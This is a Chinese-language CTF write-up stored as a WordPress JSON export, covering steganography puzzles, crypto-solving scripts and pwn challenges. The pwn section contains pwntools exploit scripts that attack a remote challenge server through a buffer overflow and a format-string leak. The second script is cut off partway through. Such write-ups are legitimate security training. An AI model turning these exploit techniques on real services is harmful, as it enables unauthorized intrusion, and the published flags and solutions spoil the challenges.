{"id":231,"date":"2025-04-20T18:55:34","date_gmt":"2025-04-20T10:55:34","guid":{"rendered":"https:\/\/www.hurkin.top\/?p=231"},"modified":"2025-04-20T20:04:58","modified_gmt":"2025-04-20T12:04:58","slug":"escape-in-the-sun-ucsc-write-up","status":"publish","type":"post","link":"https:\/\/www.hurkin.top\/index.php\/2025\/escape-in-the-sun-ucsc-write-up\/","title":{"rendered":"Escape in The Sun UCSC Write Up"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"452\" height=\"303\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146266-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-232\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146266-\u56fe\u7247.png 452w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146266-\u56fe\u7247-300x201.png 300w\" sizes=\"auto, (max-width: 452px) 100vw, 452px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Misc<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">three-ucsc<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">part1\u76f2\u6c34\u53708f02d3e7<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"328\" height=\"81\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146275-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-233\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146275-\u56fe\u7247.png 328w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146275-\u56fe\u7247-300x74.png 300w\" sizes=\"auto, (max-width: 328px) 100vw, 328px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"425\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146279-\u56fe\u7247-1024x425.png\" alt=\"\" class=\"wp-image-234\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146279-\u56fe\u7247-1024x425.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146279-\u56fe\u7247-300x124.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146279-\u56fe\u7247-768x319.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146279-\u56fe\u7247-1536x637.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146279-\u56fe\u7247.png 1538w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">part2\u4e8c\u8fdb\u5236\u8f6c\u4e00\u4e0b\uff0c\u7136\u540ebase64\uff0c\u83ab\u65af\u89e3\u51fa\u6765  -ce89-4d6b-830e-<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">part3 http\u91cc\u7ed9\u4e86\u4e2a\u5b57\u5178\uff0c\u538b\u7f29\u5305\u5bc6\u7801\u662fthinkbell\uff0c\u89e3\u538b\u83b7\u5f97flag3<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"345\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146320-\u56fe\u7247-1024x345.png\" alt=\"\" class=\"wp-image-235\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146320-\u56fe\u7247-1024x345.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146320-\u56fe\u7247-300x101.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146320-\u56fe\u7247-768x258.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146320-\u56fe\u7247.png 1290w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fde\u8d77\u6765\u5c31\u662fflag<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">USB-ucsc<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">neta\u76f4\u63a5\u68ad\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"468\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146337-\u56fe\u7247-1024x468.png\" alt=\"\" class=\"wp-image-236\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146337-\u56fe\u7247-1024x468.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146337-\u56fe\u7247-300x137.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146337-\u56fe\u7247-768x351.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146337-\u56fe\u7247-1536x701.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146337-\u56fe\u7247.png 1662w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">No.shArk-ucsc<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">qry\u57df\u540d\u8f6c\u4e8c\u7ef4\u7801\uff0c\u7136\u540e\u8865\u4e00\u4e0b\u5b9a\u4f4d\u5757<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"529\" height=\"591\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146342-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-237\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146342-\u56fe\u7247.png 529w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146342-\u56fe\u7247-269x300.png 269w\" sizes=\"auto, (max-width: 529px) 100vw, 529px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">snow\u9690\u5199\u672c\u8d28\u4e0a\u5176\u5b9e\u662fhtml\u9690\u5199) \u7136\u540e\u627e\u5230\u4e00\u4e2ahtml\u6587\u4ef6\uff0c\u91cc\u9762\u662f\u597d\u591a\u6b4c\u8bcd\uff0c\u7528snow\u9690\u5199\u89e3\u4e00\u4e0b\u83b7\u5f97part2<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"932\" height=\"42\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146347-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-238\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146347-\u56fe\u7247.png 932w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146347-\u56fe\u7247-300x14.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146347-\u56fe\u7247-768x35.png 768w\" sizes=\"auto, (max-width: 932px) 100vw, 932px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u8fd8\u6709\u4e00\u4e2anext.jpg\uff0c\u540c\u65f6\u627e\u5230key\u662fkeykeyishere<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">jpg\u7684\u9690\u5199\u4e0d\u591a\uff0c\u8bd5\u4e00\u4e0b\u627e\u5230<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"664\" height=\"490\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146352-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-239\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146352-\u56fe\u7247.png 664w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146352-\u56fe\u7247-300x221.png 300w\" sizes=\"auto, (max-width: 664px) 100vw, 664px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5178\u578b\u7684\u732b\u8138\u53d8\u5316\uff0c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">import cv2<br>import numpy as np<br>img = cv2.imread(r'E:\\a.png')<br>def arnold_decode(image, shuffle_times, a, b):<br>    \"\"\" decode for rgb image that encoded by Arnold<br>    Args:<br>        image: rgb image encoded by Arnold<br>        shuffle_times: how many times to shuffle<br>    Returns:<br>        decode image<br>    \"\"\"<br>    # 1:\u521b\u5efa\u65b0\u56fe\u50cf\uff0c\u6307\u5b9a\u6570\u636e\u7c7b\u578b\u4e3a uint8<br>\u2022    decode_image = np.zeros(shape=image.shape, dtype=np.uint8)<br>    # 2\uff1a\u8ba1\u7b97N<br>\u2022    h, w = image.shape[0], image.shape[1]<br>\u2022    N = h  # \u6216N=w<br>    # 3\uff1a\u904d\u5386\u50cf\u7d20\u5750\u6807\u53d8\u6362<br>\u2022    for time in range(shuffle_times):<br>\u2022        for ori_x in range(h):<br>\u2022            for ori_y in range(w):<br>                # \u6309\u7167\u516c\u5f0f\u5750\u6807\u53d8\u6362<br>\u2022                new_x = ((a * b + 1) * ori_x + (-b) * ori_y) % N<br>\u2022                new_y = ((-a) * ori_x + ori_y) % N<br>\u2022                decode_image[new_x, new_y, :] = image[ori_x, ori_y, :]<br>    # \u4fdd\u5b58\u89e3\u7801\u540e\u7684\u56fe\u50cf<br>\u2022    cv2.imwrite(r'E:\\b.png', decode_image, [int(cv2.IMWRITE_PNG_COMPRESSION), 0])<br>\u2022    return decode_image<br># \u68c0\u67e5\u662f\u5426\u6210\u529f\u8bfb\u53d6\u56fe\u50cf<br>if img is None:<br>    raise FileNotFoundError(\"\u65e0\u6cd5\u8bfb\u53d6\u56fe\u50cf\u6587\u4ef6\uff0c\u8bf7\u68c0\u67e5\u6587\u4ef6\u8def\u5f84\u6216\u6587\u4ef6\u662f\u5426\u5b58\u5728\")<br># \u5e94\u7528\u89e3\u7801<br>arnold_decode(img, 5, 7, 3)<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"400\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146359-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-240\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146359-\u56fe\u7247.png 400w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146359-\u56fe\u7247-300x300.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146359-\u56fe\u7247-150x150.png 150w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u5c0f\u5957\u4e0d\u662f\u5957-ucsc<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ed9\u4e86\u4e2a\u4e8c\u7ef4\u7801\uff0c\u626b\u4e00\u4e0b\u83b7\u5f97\u538b\u7f29\u5305\u5bc6\u7801\uff0c\u7136\u540e\u4f2a\u52a0\u5bc6\u4fee\u590d\u4e00\u4e0b\uff0c\u53d1\u73b0\u4e0b\u9762\u6709\u4e2a\u4e0d\u5b8c\u6574\u7684png\uff0c\u8865\u5168\u4e00\u4e0b\u6587\u4ef6\u5934\uff0c\u6587\u4ef6\u5c3e\u6709OurSecret\u7684\u7279\u5f81\u7801\uff0c\u6240\u4ee5\u8981\u627e\u4e2a\u5bc6\u7801\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5957.zip\u91cc\u662f\u5f88\u591a4\u5b57\u8282\u5c0f\u6587\u4ef6\uff0c\u60f3\u5230CRC32\u7206\u7834<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1018\" height=\"390\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146363-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-241\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146363-\u56fe\u7247.png 1018w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146363-\u56fe\u7247-300x115.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146363-\u56fe\u7247-768x294.png 768w\" sizes=\"auto, (max-width: 1018px) 100vw, 1018px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u56db\u5b57\u8282\uff0c\u7136\u540e\u5c31\u662fbase\u5957\u5a03<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"570\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146367-\u56fe\u7247-1024x570.png\" alt=\"\" class=\"wp-image-242\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146367-\u56fe\u7247-1024x570.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146367-\u56fe\u7247-300x167.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146367-\u56fe\u7247-768x427.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146367-\u56fe\u7247-1536x855.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146367-\u56fe\u7247.png 2038w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"641\" height=\"470\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146375-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-243\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146375-\u56fe\u7247.png 641w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146375-\u56fe\u7247-300x220.png 300w\" sizes=\"auto, (max-width: 641px) 100vw, 641px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">flag{6f6bf445-8c9e-11ef-a06b-a4b1c1c5a2d2}<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">CRYPTO<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">essential<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">ai\u4e00\u628a\u68ad<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"666\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146381-\u56fe\u7247-1024x666.png\" alt=\"\" class=\"wp-image-244\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146381-\u56fe\u7247-1024x666.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146381-\u56fe\u7247-300x195.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146381-\u56fe\u7247-768x500.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146381-\u56fe\u7247.png 1145w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">XR4-ucsc<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">AI\u4e00\u628a\u68ad\u51fa\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">import base64<br>import random<br>import numpy as np<br>\u200b<br>\u200b<br># \u521d\u59cb\u5316S\u76d2\u51fd\u6570 - RC4\u7b97\u6cd5<br>def init_sbox(key):<br>    s_box = list(range(256))<br>    j = 0<br>    for i in range(256):<br>        j = (j + s_box[i] + ord(key[i % len(key)])) % 256<br>        s_box[i], s_box[j] = s_box[j], s_box[i]<br>    return s_box<br>\u200b<br>\u200b<br># RC4\u89e3\u5bc6\u51fd\u6570<br>def decrypt(cipher, box):<br>    res = []<br>    i = j = 0<br>    cipher_bytes = base64.b64decode(cipher)<br>    for s in cipher_bytes:<br>        i = (i + 1) % 256<br>        j = (j + box[i]) % 256<br>        box[i], box[j] = box[j], box[i]<br>        t = (box[i] + box[j]) % 256<br>        k = box[t]<br>        res.append(chr(s ^ k))<br>    return (''.join(res))<br>\u200b<br>\u200b<br># \u7834\u89e3\u968f\u673a\u6570\u751f\u6210\u5668<br>def crack_random(seed_num, data):<br>    random.seed(seed_num)<br>    flag_chars = []<br>    for i in range(36):<br>        rand_num = int(str(random.random() * 10000)[0:2])<br>        flag_char = chr(rand_num ^ data[i])<br>        flag_chars.append(flag_char)<br>    return ''.join(flag_chars)<br>\u200b<br>\u200b<br>if __name__ == '__main__':<br>    # \u7b2c\u4e00\u90e8\u5206\uff1aRC4\u89e3\u5bc6\u83b7\u53d6\u79cd\u5b50<br>    ciphertext = \"MjM184anvdA=\"<br>    key = \"XR4\"<br>    box = init_sbox(key)<br>    seed_str = decrypt(ciphertext, box)<br>    seed = int(seed_str)<br>\u200b<br>    # \u7b2c\u4e8c\u90e8\u5206\uff1a\u7ed9\u5b9a\u7684\u8f6c\u7f6e\u77e9\u9635\u6570\u636e<br>    transposed_matrix = [<br>        [1, 111, 38, 110, 95, 44],<br>        [11, 45, 58, 39, 84, 1],<br>        [116, 19, 113, 60, 91, 118],<br>        [33, 98, 38, 57, 10, 29],<br>        [68, 52, 119, 56, 43, 125],<br>        [32, 32, 7, 26, 41, 41]<br>    ]<br>\u200b<br>    # \u5c06\u77e9\u9635\u8f6c\u7f6e\u56de\u539f\u59cb\u5f62\u5f0f\u5e76\u5c55\u5e73\u4e3a\u4e00\u7ef4\u6570\u7ec4<br>    data_matrix = np.array(transposed_matrix).T<br>    data = data_matrix.flatten().tolist()<br>\u200b<br>    # \u4f7f\u7528\u83b7\u5f97\u7684\u79cd\u5b50\u7834\u89e3\u968f\u673a\u6570\u751f\u6210\u5668<br>    flag = crack_random(seed, data)<br>    print(\"\u89e3\u5bc6\u5f97\u5230\u7684flag\u662f:\", flag)<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"644\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146392-\u56fe\u7247-1024x644.png\" alt=\"\" class=\"wp-image-245\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146392-\u56fe\u7247-1024x644.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146392-\u56fe\u7247-300x189.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146392-\u56fe\u7247-768x483.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146392-\u56fe\u7247.png 1258w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">PWN<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">BoFido<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee3\u7801\u5c31\u662f\u7b80\u5355\u7684\u731c\u6570\uff0cbuf\u53ef\u4ee5\u628aseed\u8986\u76d6\u6389\uff0c\u4ece\u800c\u4f7f rand \u751f\u6210\u7684\u6570\u636e\u56fa\u5b9a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"665\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146396-\u56fe\u7247-1024x665.png\" alt=\"\" class=\"wp-image-246\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146396-\u56fe\u7247-1024x665.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146396-\u56fe\u7247-300x195.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146396-\u56fe\u7247-768x498.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146396-\u56fe\u7247.png 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"809\" height=\"682\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146400-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-247\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146400-\u56fe\u7247.png 809w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146400-\u56fe\u7247-300x253.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146400-\u56fe\u7247-768x647.png 768w\" sizes=\"auto, (max-width: 809px) 100vw, 809px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"829\" height=\"520\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146415-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-248\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146415-\u56fe\u7247.png 829w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146415-\u56fe\u7247-300x188.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146415-\u56fe\u7247-768x482.png 768w\" sizes=\"auto, (max-width: 829px) 100vw, 829px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u731c\u5bf910\u8f6e\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import * #\u5f15\u7528pwntools\u5e93<br>from LibcSearcher import *<br>misaki=1<br>if misaki:<br>    context(log_level='debug',arch='amd64',os='linux')<br>else:<br>    context(log_level='debug',arch='i386',os='linux')<br>ming=1<br>if ming:<br>    p=remote('39.107.58.236',46905)#\u914d\u7f6e\u8fdc\u7a0b\u8fde\u63a539.107.58.236:46905\/<br>else:<br>    p=process(\".\/\")#\u914d\u7f6e\u672c\u5730\u8fde\u63a5:<br>\u200b<br>def s(a):#\u53d1\u9001<br>    p.send(a)<br>def sl(a):#\u5e26\\n\u53d1\u9001<br>    p.sendline(a)<br>def sa(a,b):#\u76f4\u5230\u63a5\u6536\u5230a\u540e\u53d1\u9001b<br>    p.sendafter(a,b)<br>def sla(a,b):#\u76f4\u5230\u63a5\u6536\u5230a\u540e\u53d1\u9001b\u5e26\\n<br>    p.sendlineafter(a,b)<br>def r():#\u63a5\u6536<br>    p.recv()<br>def rl(a):#\u7b49\u5f85\u5230\u63a5\u6536\u5230a<br>    return p.recvuntil(a)<br>def get_32():#32\u4f4d\u63a5\u6536\u5730\u5740<br>    return u32(p.recvuntil(b'\\xf7')[-4:])<br>def get_64():#64\u4f4d\u63a5\u6536\u5730\u5740<br>    return u64(p.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00'))<br>def m():#\u8c03\u7528gdb<br>    gdb.attach(p)<br>def dr(a):#\u622a\u53d6\u5230a\u7ec8\u6b62<br>    return eval(p.recvuntil(a,drop=True))<br>def pr(a):<br>    print(hex(a))<br>\u200b<br>###############################################<br>len=0X25<br>payload=b'1'*len<br>sa(b'Enter your name:\\n',payload)<br>sla(b'Round 1, please choose your numbers:\\n',b'6')<br>sl(b'185')<br>sl(b'165')<br>sleep(0.1)<br>sla(b'Round 2, please choose your numbers:\\n',b'115')<br>sl(b'59')<br>sl(b'40')<br>sleep(0.1)<br>sla(b'Round 3, please choose your numbers:\\n',b'65')<br>sl(b'203')<br>sl(b'178')<br>sleep(0.1)<br>sla(b'Round 4, please choose your numbers:\\n',b'222')<br>sl(b'205')<br>sl(b'213')<br>sleep(0.1)<br>sla(b'Round 5, please choose your numbers:\\n',b'149')<br>sl(b'144')<br>sl(b'218')<br>sleep(0.1)<br>sla(b'Round 6, please choose your numbers:\\n',b'50')<br>sl(b'172')<br>sl(b'143')<br>sleep(0.1)<br>sla(b'Round 7, please choose your numbers:\\n',b'124')<br>sl(b'45')<br>sl(b'57')<br>sleep(0.1)<br>sla(b'Round 8, please choose your numbers:\\n',b'149')<br>sl(b'124')<br>sl(b'46')<br>sleep(0.1)<br>sla(b'Round 9, please choose your numbers:\\n',b'214')<br>sl(b'46')<br>sl(b'32')<br>sleep(0.1)<br>sla(b'Round 10, please choose your numbers:\\n',b'114')<br>sl(b'74')<br>sl(b'149')<br>p.interactive()#\u4e0e\u7a0b\u5e8f\u4ea4\u4e92<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">userlogin<\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"814\" height=\"504\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146430-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-249\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146430-\u56fe\u7247.png 814w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146430-\u56fe\u7247-300x186.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146430-\u56fe\u7247-768x476.png 768w\" sizes=\"auto, (max-width: 814px) 100vw, 814px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee3\u7801\u5ba1\u8ba1\uff0c\u5c06 v6 \u52a0\u5bc6\u540e\u4f20\u5165 login<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"551\" height=\"285\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146434-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-250\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146434-\u56fe\u7247.png 551w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146434-\u56fe\u7247-300x155.png 300w\" sizes=\"auto, (max-width: 551px) 100vw, 551px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e24\u6b21\u5224\u5b9a\uff0c\u7b2c\u4e00\u6b21\u5185\u5bb9\u76f4\u63a5\u544a\u8bc9\u6211\u4eec<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"537\" height=\"176\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146438-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-251\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146438-\u56fe\u7247.png 537w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146438-\u56fe\u7247-300x98.png 300w\" sizes=\"auto, (max-width: 537px) 100vw, 537px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u4f7f\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732\u51fa a1 \u7684\u5185\u5bb9\u8fdb\u884c\u7b2c\u4e8c\u8f6e\u5224\u65ad\u5373\u53ef<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"517\" height=\"180\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146442-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-252\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146442-\u56fe\u7247.png 517w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146442-\u56fe\u7247-300x104.png 300w\" sizes=\"auto, (max-width: 517px) 100vw, 517px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ea2\u51fa\u70b9<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"381\" height=\"99\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146447-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-253\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146447-\u56fe\u7247.png 381w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146447-\u56fe\u7247-300x78.png 300w\" sizes=\"auto, (max-width: 381px) 100vw, 381px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u540e\u95e8<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import * #\u5f15\u7528pwntools\u5e93<br>from LibcSearcher import *<br>misaki=1<br>if misaki:<br>    context(log_level='debug',arch='amd64',os='linux')<br>else:<br>    context(log_level='debug',arch='i386',os='linux')<br>ming=1<br>if ming:<br>    p=remote('39.107.58.236',42369)#\u914d\u7f6e\u8fdc\u7a0b\u8fde\u63a539.107.58.236 42369<br>else:<br>    p=process(\".\/\")#\u914d\u7f6e\u672c\u5730\u8fde\u63a5:<br>\u200b<br>def s(a):#\u53d1\u9001<br>    p.send(a)<br>def sl(a):#\u5e26\\n\u53d1\u9001<br>    p.sendline(a)<br>def sa(a,b):#\u76f4\u5230\u63a5\u6536\u5230a\u540e\u53d1\u9001b<br>    